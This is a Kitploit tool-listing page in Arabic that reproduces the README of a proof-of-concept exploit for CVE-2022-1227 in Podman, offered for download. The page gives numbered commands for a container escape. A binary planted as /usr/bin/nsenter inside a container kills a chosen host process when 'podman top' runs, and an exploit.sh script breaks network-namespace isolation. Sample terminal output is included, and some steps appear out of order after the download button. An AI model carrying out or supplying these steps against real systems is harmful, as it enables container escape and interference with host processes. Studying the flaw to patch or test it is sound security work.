Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2022-1227_Exploit — سكربت لاستغلال CVE-2022-1227 | Kitploit
أدوات/GitHubGitHub/louisliunova/cve-2022-1227_exploit
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالاختبار الاختراقالفريق الأحمرالهروب من الحاوية
GitHublouisliunova/cve-2022-1227_exploit

CVE-2022-1227_Exploit

سكربت لاستغلال CVE-2022-1227

عرض المستودع
14منذ 3 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2022-1227_Exploit

نص برمجي لاستغلال CVE-2022-1227.

الخلفية

  • يُوصى باستخدام Ubuntu 20.10.
  • Podman <4.0.0؛ يُوصى باستخدام 3.4.4.

TODO: أضف مبدأ عمل هذه الثغرة

تثبيت podman

اتبع التعليمات في الوثيقة الرسمية: https://podman.io/getting-started/installation#installing-on-linux

بالنسبة لـ Ubuntu 20.10، يجب أن يكون أمر التثبيت:

root@kitploit:~
sudo apt-get install podman=3.4.4+ds1-1ubuntu1

بدء سريع

استغلال بسيط

في هذا القسم، نجرب PoC بسيطًا لكسر حدود PID namespace وقتل عملية على المضيف.

فيما يلي الخطوات:

  1. شغّل حاوية باستخدام الأمر التالي: podman run --userns=keep-id --rm -d ubuntu:latest sleep infinity

  2. شغّل keep في ./exp/bin واحصل على PID الخاص بالعملية. عادةً سيعرض رقم PID الخاص به على الطرفية. وبما أن البرنامج الثنائي مضبوط على النوم لمدة 600 ثانية، ربما يجب أن تكون سريعًا لإنهاء الخطوات التالية.

    root@kitploit:~
    tems@tems-virtual-machine:~/Applications/CVE-2022-1227$ ./exp/bin/keep
    My process ID is: 7719
    Put this number to `PID` in the sendsig.c and compile!
    
  3. عدّل الكود المصدري في ./exp/src/sendsig.c وضع رقم PID الذي حصلت عليه في الخطوة السابقة في المتغير pid.

    root@kitploit:~
    int pid = OLD_VAL;
    

    إلى

    root@kitploit:~
    int pid = 7719;
    
  4. ضع البرنامج الثنائي المترجم داخل podman: podman cp ./exp/bin/sendsig $container_name :/usr/bin/nsenter

الاستغلال الكامل

في هذا القسم، نستخدم الـ sockets لتحقيق اتصال socket بين العمليات بين العميل داخل الحاوية والخادم على المضيف، وهو أمر مستحيل عادةً عندما تكون آلية العزل مكتملة. نستخدم هذه الثغرة لاختراق عزل مساحة أسماء الشبكة (net namespace) لتحقيق هذا الاستغلال.

أولاً، ادخل إلى الدليل عن طريق cd ./exp;

بمجرد تشغيل ./exploit.sh، سيتم تنفيذ كل شيء تلقائيًا؛ إذا سار كل شيء بشكل صحيح، سيعرض الخادم:

root@kitploit:~
Hello from the container!

هذا يعني أننا عبرنا مساحة أسماء الشبكة وتمكنّا من الهروب.

تنزيل الأداة
  • شغّل podman top لتفعيل الثغرة عن طريق: podman top -l

  • إذا سار كل شيء بشكل صحيح، فستُقتل العملية قيد التشغيل keep فورًا. هذا أمر غير اعتيادي، لأن العمليات داخل الحاوية عادةً لا يمكنها إرسال إشارات إلى عمليات المضيف بسبب عزل مساحة أسماء PID (PID namespace).

    root@kitploit:~
    tems@tems-virtual-machine:~/Applications/CVE-2022-1227$ ./keep
    My process ID is: 7719
    Killed